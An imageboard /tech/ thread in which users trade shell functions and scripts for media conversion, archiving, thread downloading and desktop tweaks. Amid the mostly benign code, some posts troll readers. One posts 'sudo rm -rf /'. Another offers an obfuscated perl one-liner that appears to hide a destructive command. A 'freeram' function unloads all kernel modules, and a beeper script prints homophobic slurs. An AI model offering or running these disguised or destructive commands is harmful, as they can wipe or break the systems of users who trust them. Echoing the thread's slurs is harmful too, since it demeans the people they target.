[ / / / / / / / / / / / / / ] [ dir / aus / boxxy / choroy / dempart / f / jenny / jp / komica ]

/tech/ - Technology

Winner of the 75th Attention-Hungry Games
/caco/ - Azarath Metrion Zinthos

March 2019 - 8chan Transparency Report
Comment *
Verification *
Password (Randomized for file and post deletion; you may also set your own.)
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Show oekaki applet
(replaces files and can be used instead)

Allowed file types:jpg, jpeg, gif, png, webm, mp4, pdf
Max filesize is 16 MB.
Max image dimensions are 15000 x 15000.
You may upload 3 per post.

File: fd42ed2ac444ec9⋯.jpg (1.66 MB, 2460x1573, 2460:1573, fd42ed2ac444ec95645e3277e3….jpg)


Post your shell commands or ideas for shell commands. I'm compiling a list. Here's what I got so far:


# Resize an image with GIMP's batch (Script-Fu) interpreter using the
# high-quality LoHalo interpolator.
# $1: input file  $2: "WIDTH HEIGHT" (space-separated, passed unquoted
#     into gimp-image-scale-full)  $3: output file
# NOTE(review): "$input"/"$output" are interpolated into the Script-Fu
# string, so paths containing double quotes or backslashes will break it.
gimpresize(){ input="$1"; res="$2"; output="$3"; gimp -ib "(let* ((image (car (gimp-file-load RUN-INTERACTIVE \"$input\" \"\")))(drawable (car (gimp-image-get-active-layer image))))(gimp-image-scale-full image $res INTERPOLATION-LOHALO)(gimp-file-save RUN-NONINTERACTIVE image drawable \"$output\" \"\"))(gimp-quit 0)";}
# gimpresize input.png 1920\ 1080 output.png

# Resize an image with ImageMagick via linear RGB with sigmoidal-contrast
# compensation (avoids the artifacts of naive sRGB-space resizing).
# $1: input file  $2: geometry (e.g. 1920x1080)  $3: output file
# Fix: quote all expansions so paths/geometry with spaces don't split.
imagemagickresize(){ input="$1"; res="$2"; output="$3"; convert "$input" -colorspace RGB +sigmoidal-contrast 12.09375 -filter Lanczossharp -distort resize "$res" -sigmoidal-contrast 12.09375 -colorspace sRGB "$output";}
# imagemagickresize input.png 1920x1080 output.png

# Convert a video to an optimized GIF: generate a palette, re-encode the
# video with it, then let gifsicle resize/quantize and optimize in place.
# $1: input video  $2: output width (px)  $3: color count  $4: output gif
# Fixes: quote all expansions; pass -y for the palette so a rerun doesn't
# hang on ffmpeg's interactive "overwrite /tmp/palette.png?" prompt.
vidtogif(){ input="$1"; res="$2"; colors="$3"; output="$4"; ffmpeg -y -i "$input" -vf palettegen /tmp/palette.png && ffmpeg -i "$input" -i /tmp/palette.png -lavfi paletteuse "$output" && gifsicle -b -O3 --resize-width "$res" --colors "$colors" -i "$output";}
# vidtogif input.webm 640 200 output.gif

# Encode a video to VP9/Opus WebM at constant quality.
# $1: input  $2: CRF (lower = better quality, e.g. 40)
# $3: audio bitrate (e.g. 192K)  $4: output file
# Fix: quote all expansions so filenames with spaces survive.
vidtowebm(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i "$input" -vcodec libvpx-vp9 -b:v 0 -crf "$videoquality" -c:a libopus -b:a "$audioquality" -g 500 -threads 8 "$output";}
# vidtowebm input.mp4 40 192K output.webm

# Encode a video to H.264/AAC MP4 at constant quality.
# $1: input  $2: CRF (e.g. 20)  $3: audio bitrate (e.g. 192K)  $4: output
# Fix: the profile must target the video stream only (-profile:v); a bare
# -profile is also applied to the AAC encoder, which rejects "high".
# Also quote all expansions.
vidtomp4(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i "$input" -c:v libx264 -crf "$videoquality" -profile:v high -level 5.1 -preset veryslow -pix_fmt yuv420p -c:a aac -b:a "$audioquality" "$output";}
# vidtomp4 input.mkv 20 192K output.mp4

# Create a 7z archive with near-maximum LZMA settings (1 GiB dictionary:
# needs ~10 GiB of RAM to compress).
# $1: archive name  $2: directory to archive
# Fix: quote expansions and add -- so names starting with "-" or "@"
# aren't parsed as switches/list files.
7zipmax(){ archive="$1"; directory="$2"; 7z a -t7z -mx9 -m0=lzma -mfb=273 -md=1024m -ms=on -mqs=on -myx=9 -mmc=200 -mlc=8 -- "$archive" "$directory";}
# 7zipmax archive.7z directory/

# Create a tar.lzma with aggressive xz/LZMA settings passed via XZ_OPT
# (1 GiB dictionary: compression needs on the order of 10 GiB of RAM).
# $1: archive name  $2: directory to archive
# Fix: quote expansions and add -- so a leading-dash name isn't an option.
tarmax(){ archive="$1"; directory="$2"; XZ_OPT="--lzma1=preset=9e,dict=1024MB,nice=273,depth=200,lc=4" tar --lzma -cf "$archive" -- "$directory";}
# tarmax archive.tar.lzma directory/

# Take a screenshot with scrot, open it in the first available viewer
# (meh/sxiv/feh/nomacs), then prompt whether to upload it to chiru.no.
# The escaping is deliberate and load-bearing: \$f must survive into
# scrot's -e handler (scrot substitutes the filename there), and \\\$yn
# must survive one level further so the inner shell reads the answer.
# Do not "fix" the quoting without tracing each evaluation level.
screenshot(){ scrot -e "meh \$f || sxiv \$f || feh \$f || nomacs \$f && read -erp Upload\? -n1 yn && [ \\\$yn == y ] && curl -F upload=@\$f https://chiru.no";}
# screenshot

# Repeatedly upscale an image with waifu2x at growing scale ratios until
# the converter fails (e.g. runs out of memory), keeping the last result.
# JPEG sources get a denoise level derived from their detected Quality;
# sources with no Quality metadata (e.g. PNG) are only upscaled.
# Fixes: test for an empty $quality BEFORE the numeric comparisons
# (the original ran `[ "" -gt 95 ]`, an error, for non-JPEG input) and
# quote all path/value expansions.  $parameters is intentionally
# unquoted: it holds multiple words that must split into arguments.
waifu2xmax(){ input="$1"; output="$2"; quality=$(identify -verbose "$input" | grep -oP "(?<=Quality: ).*"); if [ -z "$quality" ]; then parameters="-m scale --scale_ratio"; else noiselevel=3; [ "$quality" -gt 95 ] && noiselevel=2; [ "$quality" -gt 98 ] && noiselevel=1; parameters="-m noise_scale --noise_level $noiselevel --scale_ratio"; fi; iteration=2; while waifu2x-converter-cpp -i "$input" --force-OpenCL $parameters $iteration -o "$output"; do ((iteration++)); done;}
# waifu2xmax input.png output.png

# Force the flat (unaccelerated) libinput pointer profile on every
# xinput device id from 0 through 99.  All output and errors are
# discarded, because most of those ids do not correspond to a device.
mouseaccelerationdisable() {
    for deviceid in {0..99}; do
        xinput set-prop "$deviceid" "libinput Accel Profile Enabled" 0 1
    done &> /dev/null
}
# mouseaccelerationdisable


Here are my scripts. Made for POSIX sh with rare exceptions like find -print0.



why'd you have them as functions instead of aliases in a .bashrc?



javac /home/random/javafile.class

java javafile

Now that’s how you compile a Java file, mommas dearest



Try to do an alias that does

echo foo "$@" bar



Nice! Thanks :)



ok but in that example it doesn't seem any less convenient than just running the regular command anyway



yep that's a one liner


sudo rm -rf /



>using rm -rf /

>not using

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'



why would you want to unironically triforce?


# Minimal clipboard: pipe into _copy, read back with _paste.  Uses a
# fixed scratch file so the buffer is shared between shells.
_copy () { cat > /tmp/paste; }
_paste () { cat /tmp/paste; }
# Command-line calculator: joins all arguments into one awk expression.
# Fix: use $* (joined into a single word) instead of "$@" — inside the
# double-quoted program string, "$@" splits into separate awk arguments
# and breaks multi-argument calls such as: calc 3 '*' 4
calc() { awk "BEGIN{print $*}"; }

# show man page for word under/right before cursor
# upon exiting man, the line is in the state you left it in
function man_on_word {
# if in between words, move position to the first one
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" = " " ]; do
true $((--TMP_POS))
while [ $TMP_POS -gt 0 ] && [ "${TMP_LN:TMP_POS:1}" != " " ]
do true $((--TMP_POS))
if [ 0 -ne $TMP_POS ]; then true $((++TMP_POS));fi
man "$TMP_WORD"
bind -x '"\C-k":man_on_word'
bind -m vi-command -x '"K":man_on_word' # for set -o vi

# ~/bin/ffconv:
# use like: find /foo/bar -name "*.webm" -print0 | xargs -P<Ncores> -0 -I{} ffconv -e mp3 -o /the/output/dir "{}" -q:a 7
# the arguments after "{}" are passed directly to ffmpeg
# has to be separate file, because of xargs
function runff() {
echo @@@@@@@@@@@@@@@@@@@@@@@@@@
echo -- ffmpeg "$@"
echo @@@@@@@@@@@@@@@@@@@@@@@@@@
ffmpeg -hide_banner "$@"


while [ $# -gt 0 ]; do case "$1" in
(-e) ext="$2"; shift 2;;
(-o) dir="$2"; shift 2;;
(-t) tag=1; shift 1;;
(*) break;;
if [ $# -lt 1 ]; then
echo "usage ${0##*/} [-e <ext>] [-o <out_dir>] [-t] <file> [<ffmpeg_arg1> [<ffmpeg_arg2>, ..] ]"
exit 1

if [ "$tag" = 1 ]; then
t=$(grep -o -P '$(\d+)' <<< "$file")
id3v2 -T "$t" "$file"

runff -i "$file" "$@" "$dir/${file%.*}.$ext"



Rate my WebM script:

#!/usr/bin/env sh

trap finish 1 2 14 15

finish ()
command rm -f -- "${PASSLOG}-0.log"
unset encode error finish help \
exit $1

help ()
command cat << EOF
Encode a video with VP9 codec using FFmpeg.

-h : display this help and exit
-q : set the encoding quality
between 0 and 63, 0 is lossless, default is 30
-t : set the number of threads to use
-f : do not prompt before overwriting

error ()
printf "%s: %s -- '%s'\n" "$NAME" "$1" "$OPTARG" >&2
finish 1

encode ()
printf 'Pass #%d...\n' $1
case "$1" in
1) TMP0='-y'
command ffmpeg -v error -stats $TMP0 \
-i "$INPUT" -map 0:v:0 -map_chapters -1 -map_metadata -1 \
-sws_flags lanczos+accurate_rnd+full_chroma_int+bitexact \
-c:v libvpx-vp9 -b:v 0 -auto-alt-ref 1 -lag-in-frames 25 \
-tile-columns 0 -frame-parallel 0 -aq-mode none -row-mt 1 \
-cpu-used 0 -deadline best \
-threads $THREADS -crf $QUALITY -lossless $LOSSLESS \
-pass $1 -passlogfile "$PASSLOG" -f ivf -bitexact -- "$TMP1"
return $?

NAME="`basename -- "$0"`"
THREADS=`grep -c ^processor /proc/cpuinfo`

while getopts hfq:t: TMP0; do
case "$TMP0" in
h) help ;;
f) OVERWRITE='-y' ;;
q) case "$OPTARG" in
*) error 'incorrect encoding quality' ;;
t) case "$OPTARG" in
if [ $OPTARG -gt $THREADS ]; then
error 'not enough CPU cores'
*) error 'incorrect number of threads' ;;
shift $((OPTIND-1))

if [ -z "$1" ]; then
if [ -z "$2" ]; then
PASSLOG="`basename -- "$OUTPUT"`"

encode 1 && encode 2

finish $?


File: cb7d3429aa0e290⋯.gif (Spoiler Image, 289.78 KB, 180x132, 15:11, 1531263452227-b.gif)


rem quick delete fetish porn folder

del c:\USERS\anon\progra~1\text\library\fap

del c:\panic.bat

shutdown -r


I hacked this together about a year ago, and it somehow works



containsElement () {
local e match="$1"
for e; do [[ "$e" == "$match" ]] && return 0; done
return 1

for userdir in "$@"
echo "$userdir"
if [[ "$userdir" = /* ]]; then

unset songs
declare -a songs
if [[ -d "${musicdir}" ]]; then
while read -r -d $'\0'; do
done < <(find "${musicdir}" -iname "*.flac" -printf "%P\0")
elif [[ -f "${musicdir}" ]]; then
songs[0]="$(basename "${musicdir}")"
musicdir="$(dirname "${musicdir}")"
echo "${songs[0]}"

declare mp3folder
if [[ ${#songs[@]} -eq 0 ]]; then
echo "no flacs found, skipping folder..."
elif [[ ${#songs[@]} -eq 1 ]]; then
song=$(basename "${songs[0]}")
/usr/bin/ffmpeg -i "${musicdir}/${songs[0]}" -acodec libopus -b:a 128K -vbr on -compression_level 10 "${mp3folder}/${songoutput}"
ln -s "${mp3folder}/${songoutput}" "/var/www/music/"
elif [[ ${#songs[@]} -gt 1 ]]; then
foldername="$(basename "$musicdir")"
for song in "${songs[@]}"; do
diskname="$(dirname "${song}")"
if [[ "$diskname" == "." ]]; then
containsElement "$diskname" "${disks[@]}"
if [[ $? -ne 0 ]]; then

mkdir "${mp3dir}/${foldername}"
for disk in "${disks[@]}"; do
mkdir "${mp3dir}/${foldername}/${disk}"

parallel --jobs=-1 -q /usr/bin/ffmpeg -i "${musicdir}/{}" -acodec libopus -b:a 128K -vbr on -compression_level 10 "${mp3dir}/${foldername}/{.}.opus" ::: "${songs[@]}"
pushd "$mp3dir"
zip -r "${foldername}.zip" "${foldername}"
ln -s "${mp3dir}/${foldername}.zip" "/var/www/music/"



Surprisingly benign, was expecting 'rm -rf ~ 2> /dev/null &'


I haven't posted here in a while but here's an improved version of my external viewer script for w3m. depends on guile, mupdf, mpv, & wget. I keep meaning to write a downloader in guile as a replacement for wget but haven't gotten around to it yet. regardless it's quite robust and gets the job done.

#!/usr/local/bin/guile -s
(use-modules (ice-9 regex)) ; for match-string and regexp-substitute

(define (run-temporary url . proc)
; passes each file in a directory as a operand to a function.
(define (file-do proc path)
(define dir (opendir path))
(do ((entry (readdir dir) (readdir dir)))
((eof-object? entry))
(if (not (or (equal? entry ".") (equal? entry "..")))
(proc entry)))
(closedir dir))
; deletes all temporary files, the temporary directory, and then exits.
(define (safe-close path)
(file-do delete-file path)
(rmdir path)
; creates a temporary directory in a race condition free manner.
(define (mkdtemp path)
(catch 'system-error
(lambda () (mkdir path))
(lambda return
(let ((errno (system-error-errno return)))
(if (= errno EEXIST) (mkdtemp (tmpnam))))))
(define path (mkdtemp (tmpnam)))
; SIGHUP, SIGINT, & SIGQUIT are not needed due to being daemonized.
(sigaction SIGTERM (lambda (x) (safe-close path)) 0)
(chdir path)
; ftp is NOT PORTABLE replace with module gnutls and networking stack?
; or otherwise just replace with wget.
(system* "wget" url)
(file-do (lambda (x) (apply system* (append proc (list x)))) path)
(safe-close path))

(define (daemonize)
; double fork to prevent zombies on system-v derivatives.
(if (not (= (primitive-fork) 0)) (primitive-_exit 0) (setsid))
(if (not (= (primitive-fork) 0)) (primitive-_exit 0))
; close old stdin, stdout, & stderr
(close-fdes 0)
(close-fdes 1)
(close-fdes 2)
; redirect stdin, stdout, & stderr to /dev/null. dup->fdes isn't strictly
; necessary here because open automatically uses the lowest fde and we just
; closed the lowest three, but it makes things a bit more clear, and it's a
; good habit to have in case of threading.
(dup->fdes (open "/dev/null" O_RDONLY) 0)
(dup->fdes (open "/dev/null" O_WRONLY) 1)
(dup->fdes (open "/dev/null" O_WRONLY) 2))

(let ((still ".png|.jpg|.jpeg|.bmp|.pdf|.epub")
(loops ".gif|.webm")
(gallery "imgur.com/gallery/")
(album "imgur.com/a/")
(imgur "imgur")
(url (cadr (command-line))))

(cond ((string-match still url) (run-temporary url "mupdf"))
((string-match loops url) (run-temporary url "mpv" "--loop=inf"))
((string-match gallery url) (run-temporary
(regexp-substitute #f (string-match "gallery" url) 'pre "a" 'post "/zip") "mupdf"))
((string-match album url) (run-temporary (string-append url "/zip") "mupdf"))
((string-match imgur url) (run-temporary (string-append url ".jpg") "mupdf"))
(else (system* "mpv" "--ytdl-format=webm+bestaudio/720p/720p60" "--slang=en" url))))

And here's the script I use for screenshots, depends on ffmpeg and guile. once again robust and gets the job done, bar having to change screen size for different platforms.

#!/usr/local/bin/guile -s
(define (screen-file return)
(define (screen-file-iter number)
(define file-name (string-append (passwd:dir (getpwuid (getuid))) "/screen" (number->string number) ".png"))
(catch 'system-error
(lambda () (open file-name (logior O_CREAT O_EXCL)))
(lambda response
(if (= (system-error-errno response) EEXIST)
(screen-file-iter (+ number 1))
(begin (display response) (exit)))))
(return file-name))
(screen-file-iter 1))

(system* "ffmpeg" "-loglevel" "-8" "-f" "x11grab" "-video_size" "1366x768" "-i" ":0" "-vframes" "1" "-y" (call/cc screen-file))

I'm also considering rewriting my podcatcher shell script to use guile's XML parser and adding support for youtube channel RSS feeds so I can subscribe to a couple gardening channels I watch instead of manually visiting the RSS page every few weeks. I'll post it here when it's done if there is interest.


requesting a good wget/curl script to dl files from threads



That really isn't a hard thing to do.

I think i have one somewhere but basically all you need to do is

>curl thread link

>regex the file link which is typically media.8ch.net/file_store/[sha256][ext]

>wrap it all in a for loop and wget from that



Not exclusively for files, but I use this to archive the whole thread:

wget -bEHkprl 'inf' -So 'wget.log' \
--accept-regex="^https?://(media\.|softserve\.)?8ch\.net/((${B}/(res/${T}\.html|threads\.json)|main\.js)|(${B}/(thumb|src)|file_store(/thumb)?|js|static|stylesheets)/.*)$" \
--warc-cdx --warc-file="8ch.${B}.${T}" -nH -P "8ch.${B}.${T}" -- "https://8ch.net/${B}/res/${T}.html"

Where ${B} is the board directory (e.g. "tech") and ${T} is the thread number (e.g. "1003160").

And my wgetrc looks like this:

check_certificate   = off
ignore_length = on
inet4_only = on
restrict_file_names = nocontrol
retry_connrefused = on
robots = off
timestamping = on
tries = inf
trust_server_names = on
user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36




Thanks, Anon.



If you wanted a robust way to do this in the future which works across imageboards you could pretty easily use the common API used by all imageboards to get the json data then parse and download from there.


This is a script I've used for quite a while to organize the files in my download directory by their mime type.


die () {
echo -e "\033[0;31m$*\033[m" >&2
exit 1


if [ ! -d "$DIR" ]; then
die "Not a valid dir you dumbutt!"

for file in "$DIR"/* ; do
if [ -f "$file" ]; then
mime=$(file -ib "$file" | cut -f1 -d ';')
if [ ! -d "$DIR/$mime" ]; then
mkdir -p "$DIR/$mime" || die "Couldn't make the directory $mime. Check if it already exists!"
mv "$file" "$DIR/$mime" || die "Moving the file $file to directory $mime failed!"
elif [ -d "$file" ]; then
echo "Skipping a directory $file"



die () {
echo -e "\033[0;31m$*\033[m" >&2
exit 1

Don't do that, use tput(1). If you redirect stderr to a file, it'll be stupid.

if [ ! -d "$DIR" ]; then
die "Not a valid dir you dumbutt!"

Should use

[ ! -d "$DIR" ] && die message

for short stuff like this

-mime=$(file -ib "$file" | cut -f1 -d ';')
+mime=$(file -b --mime-type -- "$file")

Don't forget to use -- to avoid shit with filenames starting with a dash. At your current level, I suggest you use shellcheck.



>Try to do an alias that does



> echo foo "$@" bar


Yeah, I do it all the time, why? not POSIX?


decodes to:

NOTE_B0=31; NOTE_C1=33; NOTE_CS1=35; NOTE_D1=37; NOTE_DS1=39; NOTE_E1=41; NOTE_F1=44; NOTE_FS1=46; NOTE_G1=49; NOTE_GS1=52; NOTE_A1=55; NOTE_AS1=58; NOTE_B1=62; NOTE_C2=65; NOTE_CS2=69; NOTE_D2=73; NOTE_DS2=78; NOTE_E2=82; NOTE_F2=87; NOTE_FS2=93; NOTE_G2=98; NOTE_GS2=104; NOTE_A2=110; NOTE_AS2=117; NOTE_B2=123; NOTE_C3=131; NOTE_CS3=139; NOTE_D3=147; NOTE_DS3=156; NOTE_E3=165; NOTE_F3=175; NOTE_FS3=185; NOTE_G3=196; NOTE_GS3=208; NOTE_A3=220; NOTE_AS3=233; NOTE_B3=247; NOTE_C4=262; NOTE_CS4=277; NOTE_D4=294; NOTE_DS4=311; NOTE_E4=330; NOTE_F4=349; NOTE_FS4=370; NOTE_G4=392; NOTE_GS4=415; NOTE_A4=440; NOTE_AS4=466; NOTE_B4=494; NOTE_C5=523; NOTE_CS5=554; NOTE_D5=587; NOTE_DS5=622; NOTE_E5=659; NOTE_F5=698; NOTE_FS5=740; NOTE_G5=784; NOTE_GS5=831; NOTE_A5=880; NOTE_AS5=932; NOTE_B5=988; NOTE_C6=1047; NOTE_CS6=1109; NOTE_D6=1175; NOTE_DS6=1245; NOTE_E6=1319; NOTE_F6=1397; NOTE_FS6=1480; NOTE_G6=1568; NOTE_GS6=1661; NOTE_A6=1760; NOTE_AS6=1865; NOTE_B6=1976; NOTE_C7=2093; NOTE_CS7=2217; NOTE_D7=2349; NOTE_DS7=2489; NOTE_E7=2637; NOTE_F7=2794; NOTE_FS7=2960; NOTE_G7=3136; NOTE_GS7=3322; NOTE_A7=3520; NOTE_AS7=3729; NOTE_B7=3951; NOTE_C8=4186; NOTE_CS8=4435; NOTE_D8=4699; NOTE_DS8=4978;
underworld_tempo=( 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 3 12 12 12 12 12 12 6 6 18 18 18 6 6 6 6 6 6 18 18 18 18 18 18 10 10 10 10 10 10 3 3 3 );
underworld_message=( "O" "P " "is " "a " "faggot" ".\n" "" "" "O" "P " "is " "a " "faggot" ".\n" "" "" "A " "big " "fucking " "faggot" ".\n" "" "" "" "A " "big " "fucking " "faggot" ".\n" "" "" "" "O" "P" " i" "s " "a " "f" "a" "g" "g" "o" "t.\n" "O" "P" " i" "s " "a " "f" "a" "g" "g" "ot.\n" );
_alarm() { { ( \speaker-test --frequency $1 --test sine )& pid=$!; sleep 0.${2}s; disown $pid; kill -9 $pid; } &> /dev/null; }; while true; do for((i=0;i<${#underworld[@]};i++)); do if [ ${underworld[$i]} -ne 0 ]; then printf "%b" "${underworld_message[$i]}"; _alarm ${underworld[$i]} ${underworld_tempo[$i]}; else sleep 0.${underworld_tempo[$i]}; fi; sleep 0.0${underworld_tempo[$i]}; done done

A simple repeating countdown timer to beep every $1 seconds:

alias beepe='function _beepe(){ watch -pbn $1 return 1; }; _beepe'
put it in .bashrc or equivalent
beepe 120

will beep every 2 minutes, since "return 1" causes the watch command to see a non-zero exit precisely (-p) every $1 seconds (-n $1) and perform the beep (-b)

Adjust to run in background, kill running jobs, etc as required.



Show me such an alias.



>Show me such an alias.




alias foofunc='function _foofunc(){ echo foo "$@" bar; }; _foofunc'

$foofunc such an alias
foo such an alias bar



not sure why you don't base64 the audio through aplay instead of speaker-test, or even use the -w option with speaker-test to play a wav file from stdin.




What's the point of an ALIAS in this case? You're not aliasing a name to anything, you're just recreating a function everytime for no reason. God, you're retarded.



Using that .wgetrc reports an incompatibility with the timestamping setting: "WARC output does not work with timestamping, timestamping will be disabled."

I put it verbatim (including the .wgetrc settings) into a script

#!/usr/bin/env bash
#save as thread-archive and chmod u+x thread-archive
wget -bEHkprl 'inf' -So 'wget.log' \
--accept-regex="^https?://(media\.|softserve\.)?8ch\.net/((${1}/(res/${2}\.html|threads\.json)|main\.js)|(${1}/(thumb|src)|file_store(/thumb)?|js|static|stylesheets)/.*)$" \
--warc-cdx --warc-file="8ch.${1}.${2}" -nH -P "8ch.${1}.${2}" \
-e 'check_certificate = off' \
-e 'ignore_length = on' \
-e 'inet4_only = on' \
-e 'restrict_file_names = nocontrol' \
-e 'retry_connrefused = on' \
-e 'robots = off' \
-e 'timestamping = on' \
-e 'tries = inf' \
-e 'trust_server_names = on' \
-e 'user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36' \
-- "https://8ch.net/${1}/res/${2}.html"

Add checks to suit. I did the above basics to test it. Works great btw. Thanks anon.



> God, you're retarded.

>I don't understand why you did it, so you're retarded.


You can add unset if it makes you feel better. With an alias you can only use parameters at the end of the command, not within it. So defining a function is one way of getting around this; another is to invoke a subshell.

...ah fuck it, let me search for a source to spoonfeed you since you won't believe you're retarded anyway...

That didn't take long, here you go:


See the answer entitled "TL;DR: Do this instead"


>bash aliases do accept arguments, but only at the end:

>If you like circumventing limitations and doing what others say is impossible,...

that sounds like me, but certainly not you faggot.

> here's the recipe. Just don't blame me if your hair gets frazzled and your face ends up covered in soot mad-scientist-style.

>The workaround is to pass the arguments that alias accepts only at the end to a wrapper that will insert them in the middle and then execute your command.


>Solution 1

>If you're really against using a function per se, you can use:

>$ alias wrap_args='f(){ echo before "$@" after; unset -f f; }; f'

>$ wrap_args x y z

>before x y z after


>You can replace $@ with $1 if you only want the first argument.


>Explanation 1


>This creates a temporary function f, which is passed the arguments (note that f is called at the very end). The unset -f removes the function definition as the alias is executed so it doesn't hang around afterwards.

>Solution 2

>You can also use a subshell:



There's a misunderstanding. I meant why define an alias and not just the function itself in your config file?



>never mentioned config

>it's about config

sure it is. lel.

we both know it doesn't need to be aliased if it is a function in a config file. If it is, it is more for a particular users convenience.

e.g. >>1004590 would see all such defined alias returned with


which may be preferable to confine such definitions to the alias set, rather than wading through the output of

$declare -F

for functions which often contains a much longer list.



Enlighten me. I was always looking for a better way than this messy regexp.


>WARC output does not work with timestamping, timestamping will be disabled.

Ah, right, forgot about that. Thanks for reminding.

By the way, you don’t have to specify the .wgetrc options via the -e flag, unless you want to.

All of them—with the exception for the robots option—have a corresponding flag.

> “check_certificate = off” is --no-check-certificate

> “ignore_length = on” is --ignore-length

> “inte4_only = on” is -4

> “restrict_file_names = nocontrol” is --restrict-file-names=nocontrol

> “retry_connrefused = on” is --retry-connrefused

> “timestamping = on” is -N

> “tries = inf” is -t inf

> “trust_server_names = on” is --trust-server-names



>-e flag or corresponding flag

Thank you anon, I was doing a quick test so used the -e than looking up each option.


> use the common API used by all imageboards to get the json data then parse and download from there.


>Enlighten me. I was always looking for a better way than this messy regexp.

I think he means the json equivalent for every thread, including this one for example, change the .html to .json


It is easier to parse. for specific content to grab.


function mkcd() {
mkdir -p $*
cd $*




As I thought. Well, it might be easier to parse but you'll also have to turn it into something human-readable.



This is exceedingly unlikely to work on account of my compiler being broken and me using a bunch of things I haven't used before, but this is more or less what I was thinking. I'll try to fix my compiler and get gnutls working on my machine so that I can test it and fix it. Might take a second, turns out openbsd, guile, and gnutls don't play very nice together.

(use-modules (json)) ;; json-string->scm ;; https://github.com/aconchillo/guile-json
(use-modules (web uri)) ;; uri parse functions
(use-modules (web client)) ;; http-request

(define-syntax download-images
(syntax-rules ()
((images-download scheme host path response)
(lambda (post)
(call-with-output-file (string-append (assoc-ref post "tis") "." (assoc-ref post "ext))
(lambda (file-port)
#:host host
#:path path)) file-port)))
(assoc-ref response "posts")))))

(let* ((uri (string->uri (cadr command-line)))
(host (uri-host uri))
(path (split-and-decode-uri-path uri))
(board (car path))
(thread (string-split (car (last-pair path)) #\.))
(list-head path (- (length path) 1))
(string-append thread ".json")))
(uri-scheme uri)
#:host host
#:path (encode-and-join-uri-path api-path)))
(response (json-string->scm (http-request api-uri)))
(mkdir thread)
(chdir thread)
(cond ((equal? host "www.4chan.org")
(uri-scheme uri)
(string-append "/" board "/" (assoc-ref post "tis") "." (assoc-ref post "ext"))
((equal? host "www.8ch.net")
(uri-scheme uri)
(string-append (assoc-ref post "tis") "." (assoc-ref post "ext"))
(else ;; vichan default
(uri-scheme uri)
(string-append "/" board "/src/" (assoc-ref post "tis") "." (assoc-ref post "ext"))


>that pic

what did I miss?



I somehow read this as a scripting thread and not a shell thread, sorry for all the irrelevant posts. Anyway this is actually the third day I've been attempting to get gnutls to compile with the guile extentions to no avail, I'm considering looking into another implementation as OBSD and GNU just seem as though they weren't meant to mix to such a degree. I'll consider making another thread for scheme and post the finished thread file downloader there.



And I guess compiling the .class file again will turn it from bytecode into a real binary...



I'd just say fuck it, and alias every linux command to their windows equivalent and watch people lose their fucking minds.


# DANGEROUS: attempt to unload every loaded kernel module, restart udev,
# and drop all page/dentry/inode caches.  In-use modules will refuse to
# unload and rmmod will print errors; expect breakage.
# Fix: the original ended "...drop_caches=3 }" with no separator, so "}"
# was passed to sysctl as an argument and the function body never closed
# (a parse error at EOF).  A ";" before "}" is required.
freeram() { lsmod | awk '{print $1}' | sudo xargs -I{} rmmod {}; sudo /etc/init.d/udev restart; sudo sysctl vm.drop_caches=3; }
# freeram




There's probably better ways to write this script (or just sort my data) but it does what I need.

>main music folder

>music folder I want to sync with my phone (don't want full library on there)

>copying files wastes disk space

>syncthing doesn't like sym links

>just wrote a script to find duplicate files without a hard link and create one

>now have 2 folders on desktop using no extra disk space

>hard link also means a tag update will update for both desktop folders and all synced devices






i never made this line, i stole it from someone on /tech/





i'm using this :


to slice clips to vp9 webm

There is an option to export as "Raw" but it results to big as fuck files. (1GB for a 10 second clip..) What do I need to modify to make it slice the clip without any re-encoding ?

Or do you know an alternative for fast slicing clip with mpv ?



For example this :


cut the video without any re-encoding

But it would be much better being able to do it with the previous script.



ffmpeg -i input.webm -ss 00:04:00 -t 180 -codec copy clip.webm

will copy from 4 minutes for 180 seconds, i.e. clip.webm is 3 minute long clip, which starts at 4 minutes into the original input.webm

you can use -ss before the input for an approximate fast search through longer videos (like a 2hr movie) then -ss after also so it picks up a keyframe - otherwise it will look like shit, or be out of sync.

ffmpeg -ss 01:00:00 -i input.webm -ss 00:04:00 -t 120 -codec copy clip.webm

would make a 2 minute clip starting 1 hour and 4 minutes into input.webm.



I know about that thanks but it is not practical when I want to cut 10 slices on a video. I want to do it directly via mpv with a keyboard shortcut.


wanted to post echoing that escape sequence that breaks your terminal to the point where it'll only display hieroglyphs, but it seems that I have forgotten what the sequence was



>breaks your terminal to a point where it'll only displays hieroglyphs

=changing your terminal encoding. Sometimes it happens if you output a binary file to stdout.

UTF-8 encoding

echo -n $'\e%G'

Reset it with


stty sane

You may have to use Ctrl+j sequence in place of Return key if it got remapped too.



>tfw typing "st"

>accidentally booted into windows

>steam opens

It doesn't break babun though. Probably I have everything set to UTF-8 to begin with. I hope so at least. But yeah it was either that or some ancient sentinel character from the 70's/80's. Was reading a little more like a real word though.



*should make the terminal write backwards too




there's many escape codes the UTF-8 was but one example


File: 2455d7b4c1f61b2⋯.png (268.71 KB, 650x560, 65:56, 1479179457483.png)


wget -erobots=0 -nc -nd -nv -Rhtml,s.jpg -HErD media.8ch.net https://8ch.net/tech/res/1003160.html

This line works for most imageboards and imageboard archives. You only need to adjust the content domain. For example:

>i.warosu.org # warosu

>i.4pcdn.org # 4plebs



echo 4oCH4payCuKWsuKAhOKWsgo=|base64 -d


# Adjust every backlight's brightness by a percentage of its maximum.
# $1 is spliced, unquoted, into the arithmetic expression inside the
# root shell, so it must begin with + or - (e.g. +5 adds 5% of
# max_brightness to the current value, -5 subtracts it).  Runs via
# sudo sh -c because writing the sysfs file requires root.
brightness(){ sudo sh -c 'for f in /sys/class/backlight/*; do echo $(($(<$f/brightness)'$1'*$(<$f/max_brightness)/100)) > $f/brightness; done';}
# brightness -5 / brightness +5


alias head='sed 11q'



absolute autism



Make it a function at least.




▲ ▲


